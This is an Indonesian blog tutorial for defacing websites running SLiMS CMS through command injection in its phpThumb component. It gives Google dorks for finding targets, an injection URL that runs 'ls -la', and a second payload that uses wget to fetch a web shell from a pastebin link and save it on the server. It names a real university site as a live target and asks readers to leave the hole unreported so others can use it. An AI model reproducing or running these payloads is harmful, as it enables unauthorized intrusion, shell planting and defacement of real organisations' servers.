Deface PoC CMS Slims Injection Upload Shell + Live Target

Hallo gan , gw gatau mau ngetik gimana lagi, jadi di kesempatan kali ini gw akan memberikan tutorial depes lagi. PoC Terbaru mungkin, ngga juga sih bug ny dari cms slims ya mungkin bug terbaru hehe 
Sans gan di blog ini gw kasih live nya kok buat belajar hehe, Jangan di index atau ditutup bug nya :c buat yang lain juga. Oke langsung aja ya

#Google Dork 1 :  intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id

Exploit untuk cek vuln atau tidak :

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9

Exploit untuk upload shell

/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://pastebin.com/raw/rDucLFqU -O zek.php;%20&phpThumbDebug=9

note : "untuk bagian yang saya pertebal bisa kalian ganti untuk url shell kalian, untuk zek.php itu nama shell nantinya"

1. Kalian dorking seperti biasa, atau live target https://www.alazhar-university.ac.id/
2. Lalu taruh exploit setelah web atau setelah path nya, terserah langsung exploit upshell atau cek vuln nya dulu juga bisa tapi disini gw langsung upshell maka tampilan akan seperti ini
3. Terus kalian panggil shell kalian dengan /lib/watermark/zek.php , itu kalo kalian make shell gw diatas
4. Disini web nya gabisa up html, kedetect hehe jadi gw upload txt aja, hackersid oke
Sumber : https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html?m=1